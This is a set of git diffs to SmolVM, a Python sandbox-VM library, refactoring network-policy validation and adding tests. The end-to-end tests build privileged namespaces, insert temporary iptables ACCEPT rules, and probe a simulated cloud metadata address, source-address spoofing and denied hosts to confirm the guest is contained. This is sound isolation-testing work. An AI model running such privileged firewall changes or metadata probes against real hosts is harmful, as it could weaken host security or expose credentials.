     BridgeTapOwnershipError,
@@ -85,7 +86,6 @@ from smolvm.storage import (
 from smolvm.storage._base import VSOCK_CID_END, VSOCK_CID_START
 from smolvm.types import (
     GuestOS,
-    InternetSettings,
     NetworkConfig,
     RootfsFormat,
     SnapshotCapturePolicy,
@@ -1630,38 +1630,17 @@ class SmolVMManager:
         settings = config.internet_settings
         if settings is None:
             return
-        # Frozen Pydantic models still contain mutable lists; model_copy also
-        # bypasses validation. Revalidate at the execution boundary.
-        settings = InternetSettings.model_validate(settings.model_dump())
-        if settings.is_allow_all_domains:
-            return
-        recovery = (
-            "Create it on Linux with backend='firecracker', comm_channel='vsock', "
-            "and default private networking instead of a bridge."
+        settings = parse_network_policy(settings)
+        validate_network_policy_options(
+            settings,
+            backend=backend,
+            guest_os=config.guest_os,
+            comm_channel=config.comm_channel,
+            has_mounts=bool(config.workspace_mounts),
+            has_forwards=bool(config.port_forwards),
+            network_mode=config.network_attachment.mode,
+            qemu_network=config.qemu_network,
         )
-        if config.network_attachment.mode != "nat" or not self._uses_host_tap_networking(
-            config, backend
-        ):
-            raise SmolVMError(
-                f"Sandbox '{config.vm_id}' cannot enforce network restrictions. {recovery}"
-            )
-        if settings.has_explicit_restrictions:
-            if backend != BACKEND_FIRECRACKER or sys.platform != "linux":
-                raise SmolVMError(
-                    f"Sandbox '{config.vm_id}' requires Linux Firecracker for this network mode. "
-                    f"{recovery}"
-                )
-            if config.workspace_mounts or config.port_forwards:
-                raise SmolVMError(
-                    f"Sandbox '{config.vm_id}' cannot use shared folders or exposed ports "
-                    "with this network mode; remove workspace_mounts and port_forwards "
-                    "before creating it."
-                )
-            if self._resolve_control_channel_for_config(config, backend).kind != "vsock":
-                raise SmolVMError(
-                    f"Sandbox '{config.vm_id}' requires a direct command connection for this "
-                    "network mode; set comm_channel='vsock' before creating it."
-                )
 
     @staticmethod
     def _policy_destinations(config: VMConfig) -> list[str] | None:

--- a/tests/api/test_snapshot.py
+++ b/tests/api/test_snapshot.py
@@ -23,6 +23,7 @@ import pytest
 
 from smolvm.exceptions import SmolVMError, VMNotFoundError
 from smolvm.types import (
+    InternetSettings,
     SnapshotArtifacts,
     SnapshotInfo,
     SnapshotType,
@@ -675,3 +676,45 @@ def test_restore_firecracker_disk_snapshot_boots_fresh_without_loading_vmstate(
     assert managed_disk.read_text() == "disk-only-ext4"
     mock_client.load_snapshot.assert_not_called()
     mock_client.start_instance.assert_called_once()
+
+
+@pytest.mark.parametrize("mode", ["off", "restricted"])
+def test_restore_policy_failure_prevents_guest_execution(smol_vm, sample_config, monkeypatch, mode):
+    monkeypatch.setattr("smolvm.vm.sys.platform", "linux")
+    monkeypatch.setattr("smolvm.comm.select.platform.system", lambda: "Linux")
+    settings = InternetSettings(
+        mode=mode, allowed_cidrs=["203.0.113.7"] if mode == "restricted" else []
+    )
+    config = sample_config.model_copy(
+        update={"internet_settings": settings, "comm_channel": "vsock"}
+    )
+    info = smol_vm.create(config)
+    snapshot_dir = smol_vm.snapshot_dir / "policy-snapshot"
+    snapshot_dir.mkdir(parents=True)
+    snapshot = SnapshotInfo(
+        snapshot_id="policy-snapshot",
+        vm_id=info.vm_id,
+        backend="firecracker",
+        artifacts=SnapshotArtifacts(
+            state_path=snapshot_dir / "state",
+            memory_path=snapshot_dir / "memory",
+            disk_path=snapshot_dir / "disk.ext4",
+        ),
+        vm_config=info.config,
+        network_config=info.network,
+        created_at=datetime.now(UTC),
+    )
+    for path in (
+        snapshot.artifacts.state_path,
+        snapshot.artifacts.memory_path,
+        snapshot.artifacts.disk_path,
+    ):
+        path.write_text("snapshot")
+    smol_vm.state.create_snapshot(snapshot)
+    smol_vm.delete(info.vm_id)
+    smol_vm.network.apply_network_policy.side_effect = SmolVMError("policy install failed")
+    adapter = MagicMock()
+    monkeypatch.setattr(smol_vm, "_runtime_adapter_for_snapshot", lambda _: adapter)
+    with pytest.raises(SmolVMError, match="policy install failed"):
+        smol_vm.restore_snapshot(snapshot.snapshot_id, resume_vm=True)
+    adapter.restore_snapshot.assert_not_called()

--- a/tests/e2e/test_network_policy.py
+++ b/tests/e2e/test_network_policy.py
@@ -17,6 +17,7 @@ from _util import BOOT_TIMEOUT, require_backend_available, selected_backend
 from smolvm import SmolVM
 from smolvm.exceptions import SmolVMError
 from smolvm.host.network import NetworkManager
+from smolvm.storage import MemoryStateManager
 from smolvm.types import SnapshotType
 
 pytestmark = pytest.mark.e2e
@@ -288,8 +289,13 @@ def test_firecracker_policy_lifecycle(policy_lab, request, tmp_path, mode):
     settings = {"mode": mode}
     if mode == "restricted":
         settings["allowed_cidrs"] = [allowed]
+    inventory = MemoryStateManager(tmp_path / "inventory")
     sandbox = SmolVM(
-        backend="firecracker", os="alpine", comm_channel="vsock", internet_settings=settings
+        backend="firecracker",
+        os="alpine",
+        comm_channel="vsock",
+        internet_settings=settings,
+        state_manager=inventory,
     )
     restored = None
     snapshot = None
@@ -303,6 +309,9 @@ def test_firecracker_policy_lifecycle(policy_lab, request, tmp_path, mode):
         assert output.read_bytes() == payload.read_bytes()
 
         def check(vm):
+            vm.upload_file(str(payload), "/tmp/policy-payload")
+            vm.download_file("/tmp/policy-payload", str(output))
+            assert output.read_bytes() == payload.read_bytes()
             assert vm.run("printf control-ok").stdout == "control-ok"
             result = vm.run(f"wget -T 1 -qO- http://{allowed}:18080/vm-allowed", timeout=5)
             assert (result.exit_code == 0) is (mode == "restricted")
@@ -317,7 +326,9 @@ def test_firecracker_policy_lifecycle(policy_lab, request, tmp_path, mode):
         snapshot = sandbox.snapshot(snapshot_type=SnapshotType.DISK)
         sandbox.stop()
         sandbox.delete()
-        restored = SmolVM.from_snapshot(snapshot.snapshot_id, backend="firecracker", resume_vm=True)
+        restored = SmolVM.from_snapshot(
+            snapshot.snapshot_id, backend="firecracker", resume_vm=True, state_manager=inventory
+        )
         check(restored)
         assert '"/vm-denied"' not in log.read_text()
     finally:

--- a/tests/e2e/test_network_policy.py
+++ b/tests/e2e/test_network_policy.py
@@ -71,6 +71,7 @@ threading.Thread(target=udp, daemon=True).start()
 http.server.ThreadingHTTPServer(("0.0.0.0", 18080), Handler).serve_forever()
 """)
     process = None
+    forwarding_rules: list[tuple[str, str]] = []
     ipv6_forwarding = privileged("sysctl", "-n", "net.ipv6.conf.all.forwarding").stdout.strip()
     try:
         privileged("sysctl", "-w", "net.ipv6.conf.all.forwarding=1")
@@ -79,6 +80,13 @@ http.server.ThreadingHTTPServer(("0.0.0.0", 18080), Handler).serve_forever()
         privileged("ip", "link", "set", peer_if, "netns", ns)
         privileged("ip", "addr", "add", f"{gateway}/24", "dev", host_if)
         privileged("ip", "link", "set", host_if, "up")
+        # Docker runners can default FORWARD to DROP. Permit only this lab's
+        # interface through that ambient firewall; SmolVM's earlier policy
+        # chains still decide which guest packets may reach it.
+        for binary in ("iptables", "ip6tables"):
+            for direction in ("-i", "-o"):
+                privileged(binary, "-w", "-I", "FORWARD", direction, host_if, "-j", "ACCEPT")
+                forwarding_rules.append((binary, direction))
         privileged("sysctl", "-w", f"net.ipv6.conf.{host_if}.forwarding=1")
         privileged("ip", "-6", "addr", "add", "fd00:534d:1::1/64", "dev", host_if, "nodad")
         for address in (allowed, denied):
@@ -133,6 +141,10 @@ http.server.ThreadingHTTPServer(("0.0.0.0", 18080), Handler).serve_forever()
                 privileged("kill", pid, check=False)
             with suppress(subprocess.TimeoutExpired):
                 process.wait(timeout=5)
+        for binary, direction in reversed(forwarding_rules):
+            privileged(
+                binary, "-w", "-D", "FORWARD", direction, host_if, "-j", "ACCEPT", check=False
+            )
         privileged("ip", "link", "del", host_if, check=False)
         privileged("ip", "netns", "del", ns, check=False)
         privileged("sysctl", "-w", f"net.ipv6.conf.all.forwarding={ipv6_forwarding}")
@@ -195,7 +207,7 @@ except (OSError,AssertionError): sys.exit(1)
         privileged("ip", "-n", ns, "-6", "route", "add", "default", "via", "fd00:534d:2::1")
         nm.apply_network_policy(tap, None)
         nm.setup_nat(tap)
-        assert reachable(allowed, token="open")
+        assert reachable(allowed, token="open"), privileged("nft", "list", "ruleset").stdout
         assert reachable("fd00:534d:1::2", token="ipv6-open"), "\n".join(
             (
                 privileged("nft", "list", "ruleset").stdout,
@@ -212,8 +224,26 @@ except (OSError,AssertionError): sys.exit(1)
         neighbor_tap = f"tap{secrets.randbelow(1000000) + 2000000}"
         privileged("ip", "link", "set", host_if, "name", neighbor_tap)
         try:
+            # Keep the ambient firewall permissive for the renamed lab too,
+            # so only SmolVM's isolation rule can make this probe fail.
+            for direction in ("-i", "-o"):
+                privileged(
+                    "iptables", "-w", "-I", "FORWARD", direction, neighbor_tap, "-j", "ACCEPT"
+                )
             assert not reachable(allowed, token="neighbor-denied")
         finally:
+            for direction in ("-i", "-o"):
+                privileged(
+                    "iptables",
+                    "-w",
+                    "-D",
+                    "FORWARD",
+                    direction,
+                    neighbor_tap,
+                    "-j",
+                    "ACCEPT",
+                    check=False,
+                )
             privileged("ip", "link", "set", neighbor_tap, "name", host_if)
         assert reachable(allowed, token="neighbor-restored")
         nm.apply_network_policy(tap, [allowed])

--- a/tests/e2e/test_network_policy.py
+++ b/tests/e2e/test_network_policy.py
@@ -1,0 +1,331 @@
+"""Live policy tests on a disposable Linux runner, using controlled destinations."""
+
+from __future__ import annotations
+
+import json
+import os
+import secrets
+import subprocess
+import sys
+import time
+from contextlib import suppress
+from pathlib import Path
+
+import pytest
+from _util import BOOT_TIMEOUT, require_backend_available, selected_backend
+
+from smolvm import SmolVM
+from smolvm.exceptions import SmolVMError
+from smolvm.host.network import NetworkManager
+from smolvm.types import SnapshotType
+
+pytestmark = pytest.mark.e2e
+
+
+def privileged(*args: str, check: bool = True) -> subprocess.CompletedProcess:
+    return subprocess.run(
+        [*([] if os.geteuid() == 0 else ["sudo", "-n"]), *args],
+        check=check,
+        capture_output=True,
+        text=True,
+        timeout=15,
+    )
+
+
+@pytest.fixture
+def policy_lab(tmp_path: Path):
+    """A routed namespace with two HTTP destinations and a UDP echo service."""
+    if sys.platform != "linux":
+        pytest.skip("Network policy packet tests require Linux")
+    privileged("true")  # Fail, do not skip, if a selected Linux runner lacks privileges.
+    suffix = secrets.token_hex(3)
+    ns, host_if, peer_if = f"np-{suffix}", f"nph{suffix}", f"npp{suffix}"
+    octet = secrets.randbelow(250) + 1
+    prefix = f"198.18.{octet}"
+    gateway, allowed, denied = f"{prefix}.1", f"{prefix}.2", f"{prefix}.3"
+    log = tmp_path / "requests.jsonl"
+    server = tmp_path / "server.py"
+    server.write_text("""import http.server, json, socket, threading
+from pathlib import Path
+import sys
+log = Path(sys.argv[1])
+def record(value):
+    with log.open("a") as f: f.write(json.dumps(value) + "\\n")
+class Handler(http.server.BaseHTTPRequestHandler):
+    def do_GET(self):
+        record(self.path)
+        self.send_response(200); self.end_headers(); self.wfile.write(b"policy-ok")
+    def log_message(self, *args): pass
+def udp():
+    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    sock.bind(("0.0.0.0", 53))
+    while True:
+        data, addr = sock.recvfrom(4096)
+        record(data.decode(errors="replace")); sock.sendto(data, addr)
+class V6Server(http.server.ThreadingHTTPServer):
+    address_family = socket.AF_INET6
+def serve6(): V6Server(("::", 18082), Handler).serve_forever()
+threading.Thread(target=serve6, daemon=True).start()
+threading.Thread(target=udp, daemon=True).start()
+http.server.ThreadingHTTPServer(("0.0.0.0", 18080), Handler).serve_forever()
+""")
+    process = None
+    ipv6_forwarding = privileged("sysctl", "-n", "net.ipv6.conf.all.forwarding").stdout.strip()
+    try:
+        privileged("sysctl", "-w", "net.ipv6.conf.all.forwarding=1")
+        privileged("ip", "netns", "add", ns)
+        privileged("ip", "link", "add", host_if, "type", "veth", "peer", "name", peer_if)
+        privileged("ip", "link", "set", peer_if, "netns", ns)
+        privileged("ip", "addr", "add", f"{gateway}/24", "dev", host_if)
+        privileged("ip", "link", "set", host_if, "up")
+        privileged("sysctl", "-w", f"net.ipv6.conf.{host_if}.forwarding=1")
+        privileged("ip", "-6", "addr", "add", "fd00:534d:1::1/64", "dev", host_if, "nodad")
+        for address in (allowed, denied):
+            privileged("ip", "-n", ns, "addr", "add", f"{address}/24", "dev", peer_if)
+        privileged("ip", "-n", ns, "addr", "add", "169.254.111.222/32", "dev", peer_if)
+        privileged("ip", "route", "add", "169.254.111.222/32", "dev", host_if)
+        privileged("ip", "-n", ns, "link", "set", peer_if, "up")
+        privileged(
+            "ip", "-n", ns, "-6", "addr", "add", "fd00:534d:1::2/64", "dev", peer_if, "nodad"
+        )
+        privileged("ip", "-n", ns, "-6", "route", "add", "default", "via", "fd00:534d:1::1")
+        privileged("ip", "-n", ns, "link", "set", "lo", "up")
+        privileged("ip", "-n", ns, "route", "add", "default", "via", gateway)
+        process = subprocess.Popen(
+            [
+                *([] if os.geteuid() == 0 else ["sudo", "-n"]),
+                "ip",
+                "netns",
+                "exec",
+                ns,
+                sys.executable,
+                str(server),
+                str(log),
+            ],
+            stdout=subprocess.DEVNULL,
+            stderr=subprocess.PIPE,
+        )
+        import urllib.request
+
+        for _ in range(50):
+            try:
+                with urllib.request.urlopen(
+                    f"http://{allowed}:18080/ready", timeout=0.2
+                ) as response:
+                    assert response.read() == b"policy-ok"
+                break
+            except OSError:
+                if process.poll() is not None:
+                    pytest.fail(f"Policy responder failed: {process.stderr.read().decode()}")
+                time.sleep(0.1)
+        else:
+            pytest.fail("Policy responder did not become ready")
+        # This is a simulated metadata service entirely inside our namespace.
+        with urllib.request.urlopen("http://169.254.111.222:18080/ready", timeout=1) as response:
+            assert response.read() == b"policy-ok"
+        yield allowed, denied, gateway, log, host_if
+    finally:
+        if process is not None:
+            # Kill namespace-owned processes before deleting the namespace.
+            result = privileged("ip", "netns", "pids", ns, check=False)
+            for pid in result.stdout.split():
+                privileged("kill", pid, check=False)
+            with suppress(subprocess.TimeoutExpired):
+                process.wait(timeout=5)
+        privileged("ip", "link", "del", host_if, check=False)
+        privileged("ip", "netns", "del", ns, check=False)
+        privileged("sysctl", "-w", f"net.ipv6.conf.all.forwarding={ipv6_forwarding}")
+
+
+def test_firewall_packet_contract(policy_lab):
+    """Exercise TCP/UDP, host access, reuse and IPv6 without KVM."""
+    allowed, denied, gateway, log, host_if = policy_lab
+    suffix = secrets.token_hex(3)
+    ns = f"npg-{suffix}"
+    tap = f"tap{secrets.randbelow(1000000) + 100000}"
+    peer = f"g{suffix}"
+    nm = NetworkManager()
+    # A test-only point-to-point subnet; no allocated SmolVM addresses touched.
+    local, guest = "192.0.2.1", "192.0.2.2"
+    probe = """import socket,sys
+family = socket.AF_INET6 if ":" in sys.argv[1] else socket.AF_INET
+s=socket.socket(family, socket.SOCK_DGRAM if sys.argv[2]=="udp" else socket.SOCK_STREAM)
+s.settimeout(1.5)
+if sys.argv[2]=="udp": s.bind(("0.0.0.0", 19001))
+try:
+ port = 53 if sys.argv[2]=="udp" else (18082 if family==socket.AF_INET6 else 18080)
+ s.connect((sys.argv[1], port))
+ request = sys.argv[3] if sys.argv[2]=="udp" else "GET /"+sys.argv[3]+" HTTP/1.0\\r\\n\\r\\n"
+ s.send(request.encode())
+ assert s.recv(4096)
+except (OSError,AssertionError): sys.exit(1)
+"""
+
+    def reachable(address, protocol="tcp", token="probe"):
+        return (
+            privileged(
+                "ip",
+                "netns",
+                "exec",
+                ns,
+                sys.executable,
+                "-c",
+                probe,
+                address,
+                protocol,
+                token,
+                check=False,
+            ).returncode
+            == 0
+        )
+
+    try:
+        privileged("ip", "netns", "add", ns)
+        privileged("ip", "link", "add", tap, "type", "veth", "peer", "name", peer)
+        privileged("ip", "link", "set", peer, "netns", ns)
+        privileged("ip", "addr", "add", f"{local}/30", "dev", tap)
+        privileged("ip", "link", "set", tap, "up")
+        privileged("sysctl", "-w", f"net.ipv6.conf.{tap}.forwarding=1")
+        privileged("ip", "-n", ns, "addr", "add", f"{guest}/30", "dev", peer)
+        privileged("ip", "-n", ns, "link", "set", peer, "up")
+        privileged("ip", "-n", ns, "route", "add", "default", "via", local)
+        privileged("ip", "-6", "addr", "add", "fd00:534d:2::1/64", "dev", tap, "nodad")
+        privileged("ip", "-n", ns, "-6", "addr", "add", "fd00:534d:2::2/64", "dev", peer, "nodad")
+        privileged("ip", "-n", ns, "-6", "route", "add", "default", "via", "fd00:534d:2::1")
+        nm.apply_network_policy(tap, None)
+        nm.setup_nat(tap)
+        assert reachable(allowed, token="open")
+        assert reachable("fd00:534d:1::2", token="ipv6-open"), "\n".join(
+            (
+                privileged("nft", "list", "ruleset").stdout,
+                privileged("ip", "-6", "neigh").stdout,
+                privileged("ip", "-n", ns, "-6", "neigh").stdout,
+                privileged("ip", "-6", "route").stdout,
+                privileged("ip", "-n", ns, "-6", "route").stdout,
+                privileged("sysctl", "-n", "net.ipv6.conf.all.forwarding").stdout,
+            )
+        )
+        assert not reachable("169.254.111.222", token="metadata-denied")
+        assert reachable(allowed, "udp", "dns-open")
+        # Temporarily model another sandbox's routed interface, then restore it.
+        neighbor_tap = f"tap{secrets.randbelow(1000000) + 2000000}"
+        privileged("ip", "link", "set", host_if, "name", neighbor_tap)
+        try:
+            assert not reachable(allowed, token="neighbor-denied")
+        finally:
+            privileged("ip", "link", "set", neighbor_tap, "name", host_if)
+        assert reachable(allowed, token="neighbor-restored")
+        nm.apply_network_policy(tap, [allowed])
+        assert reachable(allowed, token="allowed")
+        assert not reachable("fd00:534d:1::2", token="ipv6-restricted")
+        assert reachable(allowed, "udp", "dns-allowed")
+        assert not reachable(denied, token="denied")
+        # A guest changing its own source address cannot escape the interface policy.
+        privileged("ip", "route", "add", "192.0.2.4/32", "dev", tap)
+        privileged("ip", "-n", ns, "addr", "add", "192.0.2.4/32", "dev", peer)
+        privileged("ip", "-n", ns, "route", "replace", "default", "via", local, "src", "192.0.2.4")
+        assert reachable(allowed, token="spoof-allowed")
+        assert not reachable(denied, token="spoof-denied")
+        privileged("ip", "-n", ns, "route", "replace", "default", "via", local, "src", guest)
+        assert not reachable(denied, "udp", "dns-denied")
+        # Invalid replacement must leave the old policy intact, not flush it.
+        with pytest.raises(SmolVMError):
+            nm._run_nft_script(nm._network_policy_script(tap, None) + "invalid nft syntax\n")
+        assert not reachable(denied, token="failed-update")
+        assert reachable(allowed, token="old-policy")
+        nm.apply_network_policy(tap, [])
+        # Even an accidental subsequent blanket NAT permission cannot bypass off.
+        nm.setup_nat(tap)
+        assert not reachable(allowed, token="off")
+        assert not reachable("fd00:534d:1::2", token="ipv6-off")
+        assert not reachable(allowed, "udp", "dns-off")
+        # Host-addressed probes must hit the input drop, independently of a listener.
+        assert not reachable(local, token="host-off")
+        privileged("ip", "addr", "add", "2001:db8:123::1/64", "dev", tap, "nodad")
+        privileged("ip", "-n", ns, "addr", "add", "2001:db8:123::2/64", "dev", peer, "nodad")
+        assert not reachable("2001:db8:123::1", token="ipv6-off")
+        # Counters prove the IPv6/input probes reached policy, not a missing route.
+        rules = privileged("nft", "-j", "list", "table", "inet", nm._policy_table(tap)).stdout
+        counters = [
+            expr["counter"]["packets"]
+            for item in json.loads(rules)["nftables"]
+            for expr in item.get("rule", {}).get("expr", [])
+            if "counter" in expr and item.get("rule", {}).get("chain") == "input"
+        ]
+        assert sum(counters) > 0
+        nm.remove_network_policy(tap)
+        nm.apply_network_policy(tap, [denied])
+        assert reachable(denied, token="reused")
+        assert not reachable(allowed, token="stale")
+        requests = log.read_text()
+        for blocked in (
+            '"/denied"',
+            '"dns-denied"',
+            '"/off"',
+            '"dns-off"',
+            '"/stale"',
+            '"/neighbor-denied"',
+            '"/failed-update"',
+            '"/ipv6-restricted"',
+            '"/ipv6-off"',
+        ):
+            assert blocked not in requests
+    finally:
+        privileged("ip", "link", "del", tap, check=False)
+        with suppress(Exception):
+            nm.remove_network_policy(tap)
+        with suppress(Exception):
+            nm.cleanup_nat_rules(tap)
+        privileged("ip", "netns", "del", ns, check=False)
+
+
+@pytest.mark.parametrize("mode", ["off", "restricted"])
+def test_firecracker_policy_lifecycle(policy_lab, request, tmp_path, mode):
+    if selected_backend(request.config) == "qemu":
+        pytest.skip("Explicit policy currently ships on Firecracker only")
+    require_backend_available("firecracker", request.config, sandbox_name="network-policy")
+    allowed, denied, gateway, log, host_if = policy_lab
+    settings = {"mode": mode}
+    if mode == "restricted":
+        settings["allowed_cidrs"] = [allowed]
+    sandbox = SmolVM(
+        backend="firecracker", os="alpine", comm_channel="vsock", internet_settings=settings
+    )
+    restored = None
+    snapshot = None
+    try:
+        sandbox.start(boot_timeout=BOOT_TIMEOUT)
+        payload = tmp_path / "payload"
+        payload.write_bytes(b"network-off-file-transfer")
+        sandbox.upload_file(str(payload), "/tmp/policy-payload")
+        output = tmp_path / "downloaded"
+        sandbox.download_file("/tmp/policy-payload", str(output))
+        assert output.read_bytes() == payload.read_bytes()
+
+        def check(vm):
+            assert vm.run("printf control-ok").stdout == "control-ok"
+            result = vm.run(f"wget -T 1 -qO- http://{allowed}:18080/vm-allowed", timeout=5)
+            assert (result.exit_code == 0) is (mode == "restricted")
+            assert (
+                vm.run(f"wget -T 1 -qO- http://{denied}:18080/vm-denied", timeout=5).exit_code != 0
+            )
+
+        check(sandbox)
+        sandbox.stop()
+        sandbox.start(boot_timeout=BOOT_TIMEOUT)
+        check(sandbox)
+        snapshot = sandbox.snapshot(snapshot_type=SnapshotType.DISK)
+        sandbox.stop()
+        sandbox.delete()
+        restored = SmolVM.from_snapshot(snapshot.snapshot_id, backend="firecracker", resume_vm=True)
+        check(restored)
+        assert '"/vm-denied"' not in log.read_text()
+    finally:
+        target = restored or sandbox
+        with suppress(Exception):
+            target.stop()
+        with suppress(Exception):
+            target.delete()
+        if snapshot is not None:
+            with suppress(Exception):
+                target._sdk.delete_snapshot(snapshot.snapshot_id)

--- a/tests/e2e/test_network_policy.py
+++ b/tests/e2e/test_network_policy.py
@@ -116,19 +116,21 @@ http.server.ThreadingHTTPServer(("0.0.0.0", 18080), Handler).serve_forever()
         )
         import urllib.request
 
-        for _ in range(50):
-            try:
-                with urllib.request.urlopen(
-                    f"http://{allowed}:18080/ready", timeout=0.2
-                ) as response:
-                    assert response.read() == b"policy-ok"
-                break
-            except OSError:
-                if process.poll() is not None:
-                    pytest.fail(f"Policy responder failed: {process.stderr.read().decode()}")
-                time.sleep(0.1)
-        else:
-            pytest.fail("Policy responder did not become ready")
+        # Wait for both listeners and IPv6 neighbor discovery before probing
+        # policy behavior. These local lab requests must bypass proxy settings.
+        opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
+        for url in (f"http://{allowed}:18080/ready", "http://[fd00:534d:1::2]:18082/ready"):
+            for _ in range(50):
+                try:
+                    with opener.open(url, timeout=0.2) as response:
+                        assert response.read() == b"policy-ok"
+                    break
+                except OSError:
+                    if process.poll() is not None:
+                        pytest.fail(f"Policy responder failed: {process.stderr.read().decode()}")
+                    time.sleep(0.1)
+            else:
+                pytest.fail(f"Policy responder did not become ready at {url}")
         # This is a simulated metadata service entirely inside our namespace.
         with urllib.request.urlopen("http://169.254.111.222:18080/ready", timeout=1) as response:
             assert response.read() == b"policy-ok"

--- a/tests/macos/test_macos_models.py
+++ b/tests/macos/test_macos_models.py
@@ -98,7 +98,7 @@ def test_macos_vm_rejects_linux_artifacts_and_unsupported_controls(tmp_path: Pat
             macos_machine=machine,
             env_vars={"TOKEN": "secret"},
         )
-    with pytest.raises(ValidationError, match="do not support domain restrictions"):
+    with pytest.raises(ValidationError, match="do not support network restrictions"):
         VMConfig(
             guest_os=GuestOS.MACOS,
             backend="vz",

--- a/tests/runtime/test_bridge_networking.py
+++ b/tests/runtime/test_bridge_networking.py
@@ -257,7 +257,7 @@ class TestVMConfigBridgeMode:
     def test_bridge_mode_rejects_domain_allowlist(self, tmp_path: Path) -> None:
         from smolvm.types import InternetSettings
 
-        with pytest.raises(Exception, match="Domain allow-lists are not enforced"):
+        with pytest.raises(Exception, match="Network restrictions are not supported"):
             _make_vm_config_skip_paths(
                 network_attachment=NetworkAttachmentConfig(mode="bridge", bridge="br10"),
                 internet_settings=InternetSettings(allowed_domains=["example.com"]),

--- a/tests/runtime/test_internet_settings.py
+++ b/tests/runtime/test_internet_settings.py
@@ -204,3 +204,21 @@ def test_invalid_policy(settings: dict) -> None:
 def test_overlapping_ranges_are_collapsed() -> None:
     settings = InternetSettings(mode="restricted", allowed_cidrs=["10.20.0.0/24", "10.20.0.1"])
     assert settings.allowed_cidrs == ["10.20.0.0/24"]
+
+
+@pytest.mark.parametrize("value", ["example.com", "::1", "10.0.0.1/99", ""])
+def test_invalid_address_shows_usable_examples(value: str) -> None:
+    with pytest.raises(ValidationError) as error:
+        InternetSettings(mode="restricted", allowed_cidrs=[value])
+    message = str(error.value)
+    assert "Invalid IPv4 address or range" in message
+    assert "203.0.113.10" in message
+    assert "10.20.0.0/24" in message
+
+
+def test_non_aligned_range_suggests_correction_without_widening_access() -> None:
+    with pytest.raises(ValidationError, match="use '10.20.0.0/24'"):
+        InternetSettings(mode="restricted", allowed_cidrs=["10.20.0.7/24"])
+    assert InternetSettings(mode="restricted", allowed_cidrs=["10.20.0.7"]).allowed_cidrs == [
+        "10.20.0.7/32"
+    ]

--- a/tests/runtime/test_internet_settings.py
+++ b/tests/runtime/test_internet_settings.py
@@ -222,3 +222,9 @@ def test_non_aligned_range_suggests_correction_without_widening_access() -> None
     assert InternetSettings(mode="restricted", allowed_cidrs=["10.20.0.7"]).allowed_cidrs == [
         "10.20.0.7/32"
     ]
+
+
+@pytest.mark.parametrize("unknown", [{"mod": "off"}, {"enabled": False}, {"allowed_ports": [443]}])
+def test_unknown_policy_fields_are_rejected(unknown: dict) -> None:
+    with pytest.raises(ValidationError, match="Extra inputs are not permitted"):
+        InternetSettings(**unknown)

--- a/tests/runtime/test_internet_settings.py
+++ b/tests/runtime/test_internet_settings.py
@@ -78,13 +78,10 @@ class TestInternetSettings:
         with pytest.raises(ValidationError, match="allowed_domains"):
             InternetSettings(allowed_domains=["", "  "])
 
-    def test_methods_uppercased(self) -> None:
-        settings = InternetSettings(allowed_http_methods=["get", "post"])
-        assert settings.allowed_http_methods == ["GET", "POST"]
-
-    def test_methods_deduplicated(self) -> None:
-        settings = InternetSettings(allowed_http_methods=["GET", "get", "Get"])
-        assert settings.allowed_http_methods == ["GET"]
+    @pytest.mark.parametrize("methods", [["get", "post"], ["GET", "get", "Get"], ["*", "GET"]])
+    def test_unenforced_methods_rejected(self, methods: list[str]) -> None:
+        with pytest.raises(ValidationError, match="HTTP method restrictions"):
+            InternetSettings(allowed_http_methods=methods)
 
     def test_empty_methods_raises(self) -> None:
         with pytest.raises(ValidationError, match="allowed_http_methods"):
@@ -173,3 +170,37 @@ class TestResolveDomains:
         mock_getaddrinfo.side_effect = fake_resolve  # type: ignore[union-attr]
         result = resolve_domains_to_ips(["https://good.com", "https://bad.invalid"])
         assert result == ["1.2.3.4"]
+
+
+@pytest.mark.parametrize("mode", ["open", "off", "restricted"])
+def test_explicit_policy_round_trip(mode: str) -> None:
+    cidrs = ["203.0.113.7", "203.0.113.7/32", "198.51.100.0/24"] if mode == "restricted" else []
+    settings = InternetSettings(mode=mode, allowed_cidrs=cidrs)
+    assert InternetSettings.model_validate_json(settings.model_dump_json()) == settings
+    assert settings.is_allow_all_domains is (mode == "open")
+    if mode == "restricted":
+        assert settings.allowed_cidrs == ["198.51.100.0/24", "203.0.113.7/32"]
+
+
+@pytest.mark.parametrize(
+    "settings",
+    [
+        {"mode": "restricted"},
+        {"mode": "off", "allowed_cidrs": ["1.1.1.1"]},
+        {"allowed_cidrs": ["1.1.1.1"]},
+        {"mode": "open", "allowed_domains": ["example.com"]},
+        {"mode": "restricted", "allowed_cidrs": ["::/0"]},
+        {"mode": "restricted", "allowed_cidrs": ["0.0.0.0/0"]},
+        {"mode": "restricted", "allowed_cidrs": ["172.16.0.7"]},
+        {"mode": "restricted", "allowed_cidrs": ["169.254.169.254"]},
+        {"mode": "restricted", "allowed_cidrs": ["example.com"]},
+    ],
+)
+def test_invalid_policy(settings: dict) -> None:
+    with pytest.raises(ValidationError):
+        InternetSettings(**settings)
+
+
+def test_overlapping_ranges_are_collapsed() -> None:
+    settings = InternetSettings(mode="restricted", allowed_cidrs=["10.20.0.0/24", "10.20.0.1"])
+    assert settings.allowed_cidrs == ["10.20.0.0/24"]

--- a/tests/runtime/test_internet_settings.py
+++ b/tests/runtime/test_internet_settings.py
@@ -29,13 +29,13 @@ class TestInternetSettings:
 
     def test_defaults(self) -> None:
         settings = InternetSettings()
-        assert settings.allowed_domains == ["*"]
-        assert settings.allowed_http_methods == ["*"]
+        assert settings.allowed_domains == ("*",)
+        assert settings.allowed_http_methods == ("*",)
         assert settings.is_allow_all_domains is True
 
     def test_specific_domains(self) -> None:
         settings = InternetSettings(allowed_domains=["https://example.com/"])
-        assert settings.allowed_domains == ["example.com"]
+        assert settings.allowed_domains == ("example.com",)
         assert settings.is_allow_all_domains is False
 
     def test_wildcard_in_domains(self) -> None:
@@ -44,15 +44,15 @@ class TestInternetSettings:
 
     def test_url_extracts_hostname(self) -> None:
         settings = InternetSettings(allowed_domains=["https://Example.COM/", "http://api.test.io"])
-        assert settings.allowed_domains == ["example.com", "api.test.io"]
+        assert settings.allowed_domains == ("example.com", "api.test.io")
 
     def test_bare_domain_lowercased(self) -> None:
         settings = InternetSettings(allowed_domains=["  Example.COM  "])
-        assert settings.allowed_domains == ["example.com"]
+        assert settings.allowed_domains == ("example.com",)
 
     def test_bare_domain_with_port(self) -> None:
         settings = InternetSettings(allowed_domains=["example.com:8080"])
-        assert settings.allowed_domains == ["example.com"]
+        assert settings.allowed_domains == ("example.com",)
 
     def test_url_with_path_raises(self) -> None:
